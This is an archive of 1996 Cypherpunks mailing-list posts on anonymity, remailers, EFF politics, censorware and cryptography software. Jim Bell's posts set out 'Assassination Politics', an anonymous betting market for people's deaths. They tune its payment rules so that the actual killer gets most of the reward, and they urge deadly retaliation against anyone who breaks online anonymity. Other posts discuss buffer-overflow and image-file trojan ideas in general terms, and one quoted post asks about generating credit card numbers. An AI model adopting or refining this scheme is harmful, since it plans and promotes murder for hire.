Some of my analysis in AP part 1 was superficial and not really accurate, because in the example it gave, it suggested that the amount of money that would have to be included might be as little as 1/1000th of the reward money. However, chances are it'll usually be somewhat higher for this reason: Let's say a person does something REALLY AWFUL, such as Jeffrey Dahmer or another multiple murderer. Suddenly, he goes from completely anonymous to Public Enemy #1. One would suppose that if AP was operating "efficiently," he'd be dead in a week. However, if indeed he's dead in a week, and you only have to pay 1/1000th per day to place your bet on his demise, you could (hypothetically) make your bet for all seven days, paying a total of 7/1000th of the prize, and assuming the death occurred any day that week you'd be guaranteed to share in that prize. But that's the problem: You'd only _share_ in that prize, because many other people would get the same idea and they'd make similar bets, and the thing would simply turn into a Lotto-type game. The potential killer out there, aware of this problem, would hesitate to make his bet under those circumstances, because it is almost certain he'd lose at least part of the prize to others. The result would be a great deal of suspense, because nobody would know when somebody is actually going to place a prediction and carry out a killing. The AP organization would rake in the money from all those bets, but the killing would be delayed and the betting public would become unhappy. At some point the "prediction" donations would slow down, and perhaps a killer would take this as a cue to actually make his prediction. One way to avoid this is to carefully adjust the amount of payment that's required with the "prediction," raising it _just_enough_ to deter all but "informed guessing" among people who know what's going to happen. 
Or, at least, to reduce "uninformed guessing" to a level which doesn't dramatically affect the fulfillment of the donations. The problem with this is that this price-setting would be a lot of work, and is not likely to produce the "right" price. It would be somewhat akin to the kind of central planning that the communists never did very well. The problem with trying to set a price like this is that to do it right, requires WAY too much knowledge, knowledge that will often only be known by a small number of people that you can't identify. Perhaps the most obvious solution is to allow the free market to decide how much a given prediction is worth. In other words, the Invisible Hand of Adam Smith. Instead of asking for some specific amount of money along with any given prediction, simply announce that along with a prediction the predictor ought to include some portion of digital cash, although there would be no minimum amount required. Assuming the associated prediction turns out to be true, the reward fund will be distributed on a pro-rated basis, divided up based on the amount of prediction. For example, if you're the killer and you include a dollar with your prediction, and I'm a random, guessing predictor and I include a dime, you get 1/1.1 of the reward and I get 0.1/1.1. Had you included $10 with your prediction, you'd have won 10.00/10.10, and I'd get 0.1/10.10. Sure, the amount a predictor included might be as little as a dime, and if that's the only correct prediction he'll get the entire amount of the reward. But a killer would be stupid to ONLY include a dime, because somebody else could, likewise, include a dime per day for a prediction for a given person, and then he'd get half of the reward if nobody else did the same thing. And since it would only cost him $0.10 per day or $36.50 per year for a given person, he'd be dollars ahead to do this. 
It should be clear that a person who really KNEW that the target would die on a particular day would want to include enough digital cash to help ensure that he's the beneficiary of a good fraction of the reward, ideally most or all of it. On the other hand, he won't want to include so much that it's "too much" a proportion of the reward itself, since the payment is non-refundable and it reduces his net reward. The random guesser likewise wants to maximize his share, but unlike the killer does not have the specific knowledge that the death will occur on that particular day. With this system, the market is responsible for finding its own equilibrium point. The AP organization need not decide how likely a given death is, and how much money to ask for. Its job is made substantially simpler. Jim Bell jimbell at pacifier.com From stewarts at ix.netcom.com Mon Sep 2 22:11:22 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 13:11:22 +0800 Subject: [BEATING A NOT QUITE DEAD] Passive Trojan [HORSE] (was:Re: HAZ-MAT virus) Message-ID: <199609030151.SAA07328@toad.com> >The key to the success is that the application in question has to be >compromised to respond to these codes, either by design or by hacking. >Either way the individual responsible must modify the execution >mechanism, not just the data itself. A well-written program is hard to exploit, but badly written programs can often be exploited in ways that allow execution of untrusted code. For instance, the fingerd bug exploited so spectacularly by Robert Morris handed a program more input that it was ready to accept, and the program stupidly kept writing the input into the array, past the end, and out into the stack, where it could be later interpreted as executable code. If a popular GIF or JPEG interpreter was written that badly, you could possibly devise a GIF that lies about how big it is and encourages the program to scribble on its stack. 
Now, there probably aren't any like that, and it'd probably have to be Netscape or MSIE or Lview to be widespread enough to make an attack like that worthwhile. (I'd bet on MSIE, of the three of them :-) Does Microsoft have some sort of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs, trying to out-do Netscape's animated GIFs?) >Let's see -current examples of computing items with this kind of a >"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the >list keeps growing. Back when Good Times came out, everyone denied that it was possible for there to be any risk from a text file (though, as I pointed out, escape-sequence hacks have been used occasionally for over 15 years), and not long after that, the MSWord Macro Viruses started appearing. Bad Code can't always be hacked usefully, but it can always be hacked... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From molnard1 at nevada.edu Mon Sep 2 22:50:57 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 3 Sep 1996 13:50:57 +0800 Subject: In-Reply-To: <19960825000344312.AAA199@maverick> Message-ID: On Sat, 24 Aug 1996, Sean Sutherland wrote: > > Does anybody know what I can get for generating the credit card > > numbers? > > > > And they say there's hope for the youth of America. It would seem that the hope of the "youth of America" lies in convincing all others they do not exist. After all, if behaviour is the only standard by which to determine age, one only exists as a "youth" when one exhibits the negative qualities of childhood. This is then used as an excuse to segregate, control, censor, and reject one's input on the grounds of age. The offense is not being a youth. The offense is getting caught. Clueless remarks (as the above), are a form of "getting caught". 
Personally, I wouldn't be surprised to see "the youth of America" emerge as one of the biggest users of nymservers and anon remailers. With the push toward hard identities we're likely to see, I think more and more "youth" will come to realize how limiting the stigma of 'child' or 'teenager' can be, and will work to transcend it. Besides, there's always the need to hide from parents.

An entire generation of people disappearing into the woodwork, so to speak(*). Expect to see a lot of ranting about how the Internet is "stealing away childhood" when people finally catch on to what's happening. You could say that the current child porn hysteria is just the opening shot.

I wonder what kinds of laws we will see. Perhaps it will become illegal to operate a computer without a license. :-)

-David Molnar

* Yes, yes, "an entire generation" is overreaching future-speak. It ignores the millions of people who can't or won't have access to the Net, it assumes everyone will want freedom (after all, people stay in AOL's monitored chat rooms and speak Beavis and Butthead to each other all day long), it assumes enough things to make it a piece of empty rhetoric. However, it's a nice-sounding piece of empty rhetoric.

From declan at eff.org Mon Sep 2 22:55:10 1996
From: declan at eff.org (Declan McCullagh)
Date: Tue, 3 Sep 1996 13:55:10 +0800
Subject: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
In-Reply-To: <01I90CVK55W89JDDSI@mbcl.rutgers.edu>
Message-ID:

On Mon, 2 Sep 1996, E. ALLEN SMITH wrote:

> I would suggest that support for "parental empowerment" and for
> any sort of mandated rating system (e.g., PICS with a requirement to rate
> pages for parental censorship use) be a down-rating.

No arguments here. Check out the latest article to follow up on the CyberWire Dispatch story in which Brock and I revealed what the "smut-blockers" *really* block. It's in Internet World Online, at the URL below.
-Declan

// declan at eff.org // I do not represent the EFF // declan at well.com //

Linkname: Who Will Watch the Watchmen?
Filename: http://www.iw.com/current/feature3.html

WHO WILL WATCH THE WATCHMEN?

By Eric Berlin and Andrew Kantor

Porno-filtering software may be blocking out more than most people realize.

Porno-filtering software or "censorware" is a big thing these days. It lets parents make sure their kids aren't seeing Bad Things on the Net -- things like pornography, violence, and information about drugs.

Oh, and did we mention AIDS, Judaism, fascism, and some guy named Fred? How about any Web site in the crl.com domain?

Thanks to an apparent philosophy of "block first, ask questions later" -- plus a combination of overzealousness, with a little laziness and ignorance tossed in -- some filtering software is screening out more than most people expect. To top it off, often neither users of the software nor owners of the blocked sites know about it.

[...]

From pstira at escape.com Mon Sep 2 23:30:19 1996
From: pstira at escape.com (pstira at escape.com)
Date: Tue, 3 Sep 1996 14:30:19 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020630.XAA20578@toad.com>
Message-ID:

Ah yes, why don't we just destroy ALL culture, our way is ALWAYS better ISN'T it? And those rainforest schmucks, what do THEY know... Screw those Africans who live simple lives, and fuck all the people who have dinner at 9 pm too while we're at it. Let's just all assimilate and live happily ever after.

In the meantime, I'm trying to colonize a new planet.

-Millie\n :: while : do echo 'you will be assimilated'\n done.
sfuze at tiac.net

PS: In case you didn't figure this out, I am VERY against people telling other people how to live. "Sure it's okay if you want your freedom, as long as you live like us..." -- some list on privacy guys.
Next, everyone will have to wear the same underwear sizes and speak the same language (hint: English is NOT the most spoken language in the world.)

From markm at voicenet.com Mon Sep 2 23:46:30 1996
From: markm at voicenet.com (Mark M.)
Date: Tue, 3 Sep 1996 14:46:30 +0800
Subject: Cypherpunk Mailboxes?
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, The Deviant wrote:

> Hrmm.. perhaps there's a better way...
> such as having the user and the mail server negotiate a key (i don't really
> know the details of diffie-hellman or the like, so tell me if this isn't
> feasible), and have the encryption/decryption routines strip addresses,
> so that the person is only identifiable by their key...

The mail server still has to send packets to the user. A packet sniffer might not be able to find out the actual contents of the transmission, but it would be able to find out the host that has made the connection. If this is combined with the knowledge of the times that certain users' mailboxes get cleared out, it would be possible to find out which nyms belong to which people. The current nym servers that automatically forward mail do not have this problem.

- -- Mark

PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From tcmay at got.net Mon Sep 2 23:56:18 1996
From: tcmay at got.net (Timothy C.
May)
Date: Tue, 3 Sep 1996 14:56:18 +0800
Subject: The Esther Dyson Flap
Message-ID:

At 12:59 AM 9/3/96, Chuck Thompson wrote:

>I don't quite understand the position taken by Mr. Assange and Mr. Unicorn
>regarding recent statements attributed to Ms. Dyson. I would appreciate
>some additional insight.
>
>It appears as though they are both critical of statements (taken out of
>context according to Dyson) because of her position with the EFF. It
>appears that they both believe that she has no right to her opinion if it is
>contradictory to the policy of the EFF.

Certainly no one is suggesting she should have her right of free speech taken away from her, as a citizen. Rather, these are precarious times for the future of the Net, with actions in many countries, including the U.S. to restrict the Net in various ways. Esther Dyson is in an influential position, not just because of her new role as Chairman of the EFF. Anytime a person of her influence is seen to be supporting limitations on what private citizens can communicate to others or to the public at large, this is cause for worry.

(As both John Gilmore and Stanton McCandlish have noted, anonymity has a long history in the United States. From the Federalist Papers, to anonymous leafletting (upheld by the Supreme Court), to anonymous letters to the editor, to the basic architecture of the Postal System and the phone system, anonymity has been with us for a long time.

Esther Dyson says that anonymity on the Net can do more damage than anonymity in other forums, and thus may need to be regulated and restricted in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's term) has grown up with anonymity, and few people take the anonymous (or not) rants and charges made in the millions per day with the same degree of certainty they take print comments. Put another way, there is no clear and present danger.

And the Net makes for effective counterspeech.
As free speech advocates note, the proper remedy for bad speech is more speech.

(The links between "free speech" and "anonymity" are fairly obvious, and curtailing one curtails the other. "Congress shall make no law restricting speech" says nothing about anonymous speech being subject to regulation.)

Further, the computerized nature of Net speech makes other remedies available as well. For example, reputation-ratings services. And digital signatures (to preclude forged comments).

Speech on the Net closely resembles idiots, scholars, dweebs, and scoundrels ranting in public parks. Sometimes they accuse the mayor of adultery, sometimes they rant about UFOs, sometimes they merely utter obscenities. All are potentially dangerous, potentially ignorable, potentially humorous. And yet in none of these cases is there a demand that identification be produced, that one's papers be in order, that a "free speech license" be produced upon demand by the authorities.

(Some might say that the physical persona of the speaker means that a means of last resort--apprehending the person--exists to track down a speaker of illegal thoughts, and that this is the kind of last resort that is currently lacking for Net speech. Perhaps. But this very same lack is evidenced with anonymous pamphlets, with anonymous pieces written for newsletters (where even an editor may not know the author), and with phone calls, say, to radio call-in programs. Clearly someone calling "The Howard Stern Show" and making a preposterous, or even illegal, claim is reaching many more people than is some anonymous message to a Usenet newsgroup. Again, where is the clear and present danger with anonymous Net speech that would justify (putatively) greater restrictions on Net speech than other speech channels have?)

>Pouncing on someone, without knowing all the facts, who is vulnerable
>because of their position smacks of dirty politics - it is distasteful. Why
>not ask for the facts from the source?
Then state your opinions or make
>your threats about not contributing financially.

Well, many of us did not pounce. Speaking for myself, I strongly suspected that the newspaper article had summarized a more-nuanced point and had effectively taken just a convenient sound bite. (Also, I'd heard Dyson speak on anonymity issues before, and knew her to have some doubts about full-blown crypto anarchy.)

Now that she has somewhat clarified what it was she actually said, more issues have been raised. I believe she does not understand the problems implicit in trying to provide "accountability" for online speech. What if, for example, I offer to forward things I receive to various online forums? Am I then violating a law by "anonymizing" a message? Am I supposed to check identities? (How?) Are remailers to be declared illegal? If not, all other "accountability" laws go out the window.

This is the "knife edge," or "fork in the road," I've long talked about. If anonymity is outlawed, it will take draconian measures to enforce it--citizen-unit ID cards, officially issued encryption keys, escrow, monitoring of communications, massive penalties to deter illegal use of encryption, and other police state measures.

On the other hand, if enough degrees of freedom are left untouched, the result is a growing, expanding crypto anarchy. Government will find itself powerless to control commerce (handled via encrypted channels), will find it doesn't know the True Names of various Net entities, and will end up being chased into an enclave of things it _can_ control.

My strong hunch is that no stable solutions lie between these two extremes. This is one of those "decision points" for modern society, with attractors pulling the solution to one side or another.

We know which side we stand on. It's possible that Esther Dyson is finding herself on the other side, alongside Dorothy Denning, Louis Freeh, Donn Parker, and the other advocates of "responsible freedom."
(Anytime you hear someone speaking of "responsible freedom," look out.)

I don't call her our enemy. Perhaps she just hasn't thought things through as deeply as many of us have.

Given that I think EFF has pretty much lost any role it may have once had, for a variety of reasons we're probably all tired of hearing about, I'm not too worried about what the EFF says or does on this issue. I'm more worried, to be honest, that a person as influential _for other reasons_ as Esther Dyson is talking about responsible freedom and the need to limit certain forms of speech.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Licensed Ontologist          | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From mech at eff.org Tue Sep 3 00:35:14 1996
From: mech at eff.org (Stanton McCandlish)
Date: Tue, 3 Sep 1996 15:35:14 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To:
Message-ID: <199609022209.PAA17638@eff.org>

Also questionably relevant for an issue like this (more relevant perhaps to intellectual property issues, etc.) The political axis most relevant here is civil libertarian v. authoritarian. I don't think you'll find any authoritarians on the EFF board or staff.

Black Unicorn typed:
>
> On Mon, 2 Sep 1996, Esther Dyson wrote:
>
> > At least you don't accuse me of being a Communist.
>
> Without commenting on the question of intelligence agencies, far left and
> far right on this issue are fairly non-distinct.
>
> > Esther Dyson Always make new mistakes!
> > EDventure Holdings
> >
>
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn at schloss.li
>
>

--
Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Activist

From janke at unixg.ubc.ca Tue Sep 3 00:49:18 1996
From: janke at unixg.ubc.ca (janke at unixg.ubc.ca)
Date: Tue, 3 Sep 1996 15:49:18 +0800
Subject: LInteger Version 0.1: A C++ MPILIB
Message-ID: <199609022311.QAA01347@clouds.heaven.org>

-----BEGIN PGP SIGNED MESSAGE-----

LInteger is a C++ library designed to allow programmers to create and perform arithmetic on objects representing nearly arbitrary precision integers. Thanks to C++'s support for operator overloading, the use of the large integers in this library should be nearly as easy as the use of regular int's. In fact, much code which performs arithmetic on regular int's can be converted to code to perform the same arithmetic on arbitrary precision integers merely by substituting "LInteger" for "int".

This library is free for both commercial and non-commercial use. (See the COPYRIGHT notice included in the source distribution for exact details.)

The current version of this library is only implemented for i386+ processors, and will, probably, only compile unhacked under gcc. Additionally, it has only been tested on the Linux operating system, though I am fairly confident that it will compile, unhacked, under the OS/2 and Windows versions of gcc. (Please let me know if you get it to work!)

The basic multiprecision methods are implemented in i386+ assembly language for high speed. Multiplication is performed recursively resulting in O(lg 3) performance. Modular multiplication can be performed via Montgomery representations for a noticeable performance gain when a large number of these modular multiplications are performed.

HTML documentation for all public methods is included.

There is currently no pseudo-random or probable prime number generation included. These are my highest priorities for the next release which will, hopefully, come out shortly after I read Rabin-Miller.
:)

A link to the latest version of this library can be found at

http://www.interchg.ubc.ca/janke/linteger/index.html

Once you have the file linteger-v0.1.tar.gz, uncompress and untar it with tar -zxvf linteger-v0.1.tar.gz. Next, cd to the newly created directory linteger-v0.1 and read the file README for details on how to proceed.

The message digests for linteger-v0.1.tar.gz are

MD5: B518B338D59A8376095B9CAD74EA2E16
SHA: 445D8D1555DC18AB0DF47B9B0381F0B07D4CB644
HAVAL: 53774BA2BF60116DF9F0F476913252188DFD9D3828D19B6795BC14C19EFA7FEE

From tcmay at got.net Tue Sep 3 00:55:32 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 15:55:32 +0800
Subject: Solid Foundations
Message-ID:

At 9:57 PM 9/2/96, lcs Remailer Administrator wrote:

>Well, I just designed a nymserver that's probably more complicated and
>difficult to use than any previous one. From this experience, I have
>concluded that if you want to design a remailer with real security (as
>opposed to a penet-style server), it just won't be easy to use that
>remailer manually. Even alpha.c2.org was kind of a pain to use
>manually. I therefore think in the long run it's better to bite the
>bullet, write as secure a nym server as possible, and expect that
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>people will use special client software to use the remailer.

I strongly agree. It's very important that _foundations_ be as robust and strong as possible. Then on top of this foundation, other layers can be added without the whole structure tumbling down when flaws in the underlying protocols are discovered.

This has been one of my pet theories for a long time.
Not just the fairly obvious point that foundations need to be robust, but the specific point that one of the strengths of PGP was that it dealt with *text blocks*. Though we all want integration into our favorite programs, by building PGP around a text block there were several advantages.

First, a simpler problem than trying to deal with n different programs. Second, a text block has fewer places for flaws to creep in. Third, platform independence. Fourth, any editor or other program that can access text can potentially be used with PGP. Fifth, separating crypto functions from other functions is good, orthogonal, method-oriented design. Sixth, this allows drop-in replacements (where "hooks" are used.)

(To understand why these points are so important, one needs to look at programs which integrate crypto directly...independent verification is harder to do, bugs may be less apparent, and delays in supporting other platforms (if ever) are likely, etc..)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA   | knowledge, reputations, information markets,
Licensed Ontologist          | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From geek at algebra.com Tue Sep 3 00:55:48 1996
From: geek at algebra.com (Computer Geek)
Date: Tue, 3 Sep 1996 15:55:48 +0800
Subject: The most ridiculous SPAM in my lifetime
Message-ID: <199609030322.WAA13140@manifold.algebra.com>

This is the American reincarnation of Ostap Bender. Next spam from him will be about interplanetary chess congress, no less I am sure.
Here's what his Web page says (excerpt):

IRS> The Internet Registration Service Has Created An On-Line Service That
IRS> Will Simultaneously Register Your Web Site With The Top 400 Internet
IRS> Directories And Search Engines Operating On The Internet.
IRS>
IRS> The Proper Registration Of Your Web Site In These Directories And Search
IRS> Engines Will Insure You That When Your Potential Customers Perform A
IRS> "Net Search," Your Web Site Will Be Included In The "Search Results," And
IRS> Your Web Site Will Become A Selection For Anyone Searching The Internet
IRS> For The Products Or Services Your Company Sells.
IRS>
IRS> To Compete In This Fast Paced "Information Age" You Must Secure Your
IRS> Place In As Many Of These Directories And Search Engines As Possible... If
IRS> You Do Not... The Competition Will Simply Pass You By.
IRS>
IRS> In Order For You To Complete Your Internet Registration, All You Need To
IRS> Do Is Complete The On-Line Registration Forms On The Following Pages
IRS> And Submit Them To Our Offices Along With Your Registration Fee Of
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
IRS> $395. You Can Pay Your Registration Fee By Credit Card, Or By Company
     ^^^^^^^
IRS> Check. If You Are Paying By Check, Please Make Your Check Payable To:
IRS> Internet Registration Service.
And Mail It To:

>From nking at pvnet.com.mx Mon Sep 2 22:13:17 1996
Return-Path: nking at pvnet.com.mx
Received: from galaxy.galstar.com (ichudov at galaxy.galstar.com [204.251.80.2]) by manifold.algebra.com (8.7.5/8.6.11) with SMTP id WAA13038 for ; Mon, 2 Sep 1996 22:13:15 -0500
Received: from neptuno.pvnet.com.mx ([200.23.229.18]) by galaxy.galstar.com (8.6.12/8.6.12) with ESMTP id WAA07844 for ; Mon, 2 Sep 1996 22:00:37 -0500
Received: from nking.pvnet.com.mx ([200.23.229.43]) by neptuno.pvnet.com.mx (8.6.12/8.6.12) with SMTP id VAA27361 for ; Mon, 2 Sep 1996 21:59:40 -0500
Message-ID: <322B57BF.704 at pvnet.com.mx>
Date: Mon, 02 Sep 1996 21:55:11 +0000
From: NORMAN KING
Reply-To: nking at pvnet.com.mx
Organization: Internet Registration Committee
X-Mailer: Mozilla 3.0b7Gold (Win95; I)
MIME-Version: 1.0
To: geek at algebra.com
Subject: IMPORTANT MESSAGE!!!
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

IMPORTANT MESSAGE!!!

Dear Sirs,

It Has Recently Come To The Attention Of The Internet Registration Committee That Your Web-Site Has Not Been Properly Registered On The Internet Or On The World Wide Web. This Could Result In Your Potential Customers Being Unable To Locate You Or Find Your Web-Site On The World Wide Web.

Proper Web-Site Registration On The Internet Is Required In Order For Your Web-Site To Be Successful. There Are Currently More Than 400 Hundred Internet Directories And Search Engines Operating On The Internet. It Will Be Necessary For You To Register Your Web-Site With The Majority Of These Directories And Search Engines In Order For Your Web-Site To Become Easily Located By Your Potential Customers.

If You Do Not Become Registered With A Large Number Of These Internet Directories, Your Web Site Could Become Impossible For Your Customers To Locate, Your Web-Site Will Become Inaccessible, Therefore Becoming Dormant, Unprofitable And Inactive.
In Order To Resolve This Situation, We Urge You To Contact Our Web-Site Registration Service At The Internet Address Below By Clicking Your Mouse On This Link:

http://adgrafix.com/mail/irs.html

It Is Imperative That This Situation Be Resolved Immediately! We Hope That We Can Help You To Resolve Your Registration Problem As Soon As Possible.

Thank-You,

Sincerely,
NORMAN KING - Administrator
Internet Registration Service

From jimbell at pacifier.com Tue Sep 3 01:01:20 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 3 Sep 1996 16:01:20 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <199609030339.UAA01367@mail.pacifier.com>

At 02:06 PM 9/2/96 -0700, Stanton McCandlish wrote:

>You have to have an anonymizing system that crosses a dozen or so
>national boundaries to make such an attack infeasible for most large
>organizations. You'd need a system that crossed 50 or more widely
>disparate jurisdictions to make it infeasible to large intelligence or
>law enforcement agencies, and even then you'd have to NOT have broad
>international agreements, such as you'd called for or it would be trivial
>to force all the remailers in the chain to cough up personally
>identifiable information.
>
>> My assumption is that there will be a wide variety of Net communities with
>> different rules/regulations/attitudes towards anonymity that would apply ex
>
>This is already true.
>
>> some kind of international sanctions; I think that's appropriate.
>
>That's what bugs me - if there are some kind of sanctions coming from a
>governmental body (I may be misinterpreting you here), that's probably
>enough to kill private and well as public anonymity on the Net.
>
>Incidentally, if something does happen from a governmental direction to
>kill online anonymity, it will probably be readily broadenable to all
>other media.

At the risk of sounding like a broken record (a phrase that will get ever more obscure now that we're in the CD era...)
that's why I'm pushing AP (Assassination Politics.) While anonymous remailers and chains are great for security, there ought to be some final bulwark against violations of our security and anonymity that doesn't depend on legal arguments, or even technical refinements of encryption. When organizations such as CoS can seek Penet data with impunity, and when courts in Finland can let them, we're not safe.

Remember the saying, "The best defense is a good offense." Playing as we do now, it's like saying, "We'll try our best to maintain our security, but if it fails too bad." I propose changing it to, "We'll try our best to maintain our security, but if you manage to violate it anyway you're dead." As rude as it may sound, one of the best advantages is that this defense is free while it's not needed, and is pretty cheap when called upon.

In case anybody has any residual doubts as to whether we should enforce our rights in this way, consider this: if we've decided that we have the right to anonymity and security (through remailers and encryption) EVEN IF some people might misuse those tools to cause crime and potentially even death (which, of course, would be an exceedingly rare outcome) then I suggest we've already accepted the principle that our rights to use these tools daily are more important than the possibility of a rare negative outcome. (in the same sense that occasional fatal car accidents don't justify taking away all cars.) And if that's the case, we should also be willing to DELIVER a rare negative outcome to anyone who acts to take these rights away, particularly if such a person is adequately forewarned of our intentions.

Jim Bell
jimbell at pacifier.com

From furballs at netcom.com Tue Sep 3 01:01:40 1996
From: furballs at netcom.com (Paul S. Penrod)
Date: Tue, 3 Sep 1996 16:01:40 +0800
Subject: Passive Trojan (was:Re: HAZ-MAT virus)
Message-ID:

This has been done in the past using several variants (but not in an image program).
The key to the success is that the application in question has to be compromised to respond to these codes, either by design or by hacking. Either way the individual responsible must modify the execution mechanism, not just the data itself.

Let's see -current examples of computing items with this kind of a "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the list keeps growing.

On Mon, 2 Sep 1996, Jason Wong wrote:

>
> Actually , THINK about it, it does make an interesting idea for a trojan
> horse doesn't it ? I mean, just get a solid graphic program, insert codes
> into it so that when certain conditions, i.e. a particular gif or jpg file
> is viewed, printed, etc, the trojan activates !!
> ___________________________________________________________________________
>
> Jason Wong (CNE, MCP) Jason at MCSB.COM.SG
> Network Engineer
> MCSB Systems Pte Ltd
> ___________________________________________________________________________
>
>

From jya at pipeline.com Tue Sep 3 01:04:32 1996
From: jya at pipeline.com (John Young)
Date: Tue, 3 Sep 1996 16:04:32 +0800
Subject: POT_hot
Message-ID: <199609022339.XAA08162@pipe5.t1.usa.pipeline.com>

Foreign Affairs, Sep/Oct, Lead Essay:

"Postmodern Terrorism. The terrorism of the future may be far more destructive than terrorism as we have known it." An informative survey and pot-heat by Walter Laqueur.

Terrorism's prospects, often overrated by the media, the public, and some politicians, are improving as its destructive potential increases. Terrorism has replaced wars between nations of the 1800s and 1900s.

In the future, terrorists will be individuals or like-minded people working in very small groups. An individual may possess the technical competence to steal, buy, or manufacture the weapons he or she needs for a terrorist purpose. The ideologies such individuals and minigroups espouse are likely to be even more aberrant than those of larger groups.
And terrorists working alone or in very small groups will be more difficult to detect unless they make a major mistake or are discovered by accident.

Society has also become vulnerable to a new kind of terrorism, in which the destructive power of both the individual terrorist and terrorism as a tactic are infinitely greater. The advanced societies of today are more dependent every day on electronic information. That exposes enormous vital areas of national life to mischief or sabotage by any computer hacker, and concerted sabotage could render a country unable to function.

Why assassinate a politician or indiscriminately kill people when an attack on electronic switching will produce far more dramatic and lasting results? If the new terrorism directs its energies toward information warfare, its destructive power will be exponentially greater than any it wielded in the past -- greater even than it would be with biological and chemical weapons.

The single successful one could claim many more victims, do more material damage, and unleash far greater panic than anything the world has yet experienced.

-----

http://jya.com/pothot.txt (30 kb)

POT_hot (in 2 parts)

From hallam at ai.mit.edu Tue Sep 3 01:10:11 1996
From: hallam at ai.mit.edu (Hallam-Baker)
Date: Tue, 3 Sep 1996 16:10:11 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <50dcvo$qop@life.ai.mit.edu>
Message-ID: <322B62FD.167E@ai.mit.edu>

One of the things that you are probably not aware of is that your government tracks every phone call you make and has a complete list of everyone who you communicate with. This information is then used to identify potential dissidents who can be "monitored" - just like in the old USSR. I know that this is a fact because I know people in the business.

They also tell me that they prefer to dissuade people from entertaining guests at home.
The assumption being that the more private conversations take place the more opportunities to criticise the government there are.

>Now, what makes you think that citizen of Country A has the power or
>rights to tell politicians of Country B what to do and what they cannot
>do?

What makes you think that the concept "country" has any legitimacy whatsoever?

The Web is not politically neutral. I intended the Web to be an agent of social change. The corruption of the present social order should be apparent from the fact that we destroy food while people starve, the majority of the world's population have no political rights and political participation is only available to a tiny minority.

The Web will have an effect whenever there is an internal inconsistency within a social order. The interaction of opposed cultures via the Web will reveal these inconsistencies in a manner that requires them to be resolved.

The people of Singapore are not going to change their government because the US people convince them of the superiority of US culture. While it is patriotic for a US citizen to believe a-priori in US superiority it is unpatriotic for anyone else. What will change the government of Singapore is revealing the internal inconsistencies of the government's claims.

Phill

From gbroiles at netbox.com Tue Sep 3 01:18:21 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Tue, 3 Sep 1996 16:18:21 +0800
Subject: Anonymity and free speech
Message-ID: <1.5.4.16.19960903035433.37773f1a@mail.io.com>

Instead of discussing whether or not Esther Dyson or other EFF board members are personally comfortable with anonymity, let's talk about whether or not the EFF and its board members believe that the First Amendment provides a right to speak and associate anonymously.

(I believe that the First Amendment gives everyone the right to wear a t-shirt which says "I am an asshole." But I have no interest in wearing such a t-shirt. And so on.)
I believe that it does, and that the Supreme Court has already made that clear. In particular, I'm thinking of _NAACP v. Alabama ex rel Patterson_, _Talley_, and _McIntyre v. Ohio Elections Commission_. (Sorry for the lack of cites; 95% of my stuff is still in boxes and I'm sending this via laptop and a Ricochet modem.) If the right to speak/associate in "real life" is protected by the First Amendment, I don't see why it wouldn't be on computers and networks which are located inside the United States. And if that right is based upon the Constitution, it will take a constitutional amendment or a big sea change in the Supreme Court to take it away. (I wonder if the decision in _McIntyre_ would have gone the other way if Ms. McIntyre were selling drugs via anonymous message pools instead of discussing school funding via windshield flyers.) Discussions about the utility of anonymity would be more useful if we were designing a communication system or a constitution from scratch; but that's not our current situation. Is there serious debate about whether or not the Constitution and the Internet allow anonymous communication? (I'm not asking a rhetorical question. If someone's familiar with an argument to the contrary, please tell me about it.) Both the Constitution and the Internet are difficult to modify quickly; we probably have anonymity (like it or not) for at least a few more years. (I'm not trying to imply that US law is the only law, or that the rest of the world doesn't exist. But I don't know poo about the right to anonymity in other nations; and to a certain extent anonymity anywhere on the Internet is the same as anonymity everywhere on the Internet. Are other readers aware of other jurisdictions where anonymous speech is considered a right?) ---- Greg Broiles gbroiles at netbox.com http://www.io.com/~gbroiles From dsmith at prairienet.org Tue Sep 3 01:25:30 1996 From: dsmith at prairienet.org (David E. 
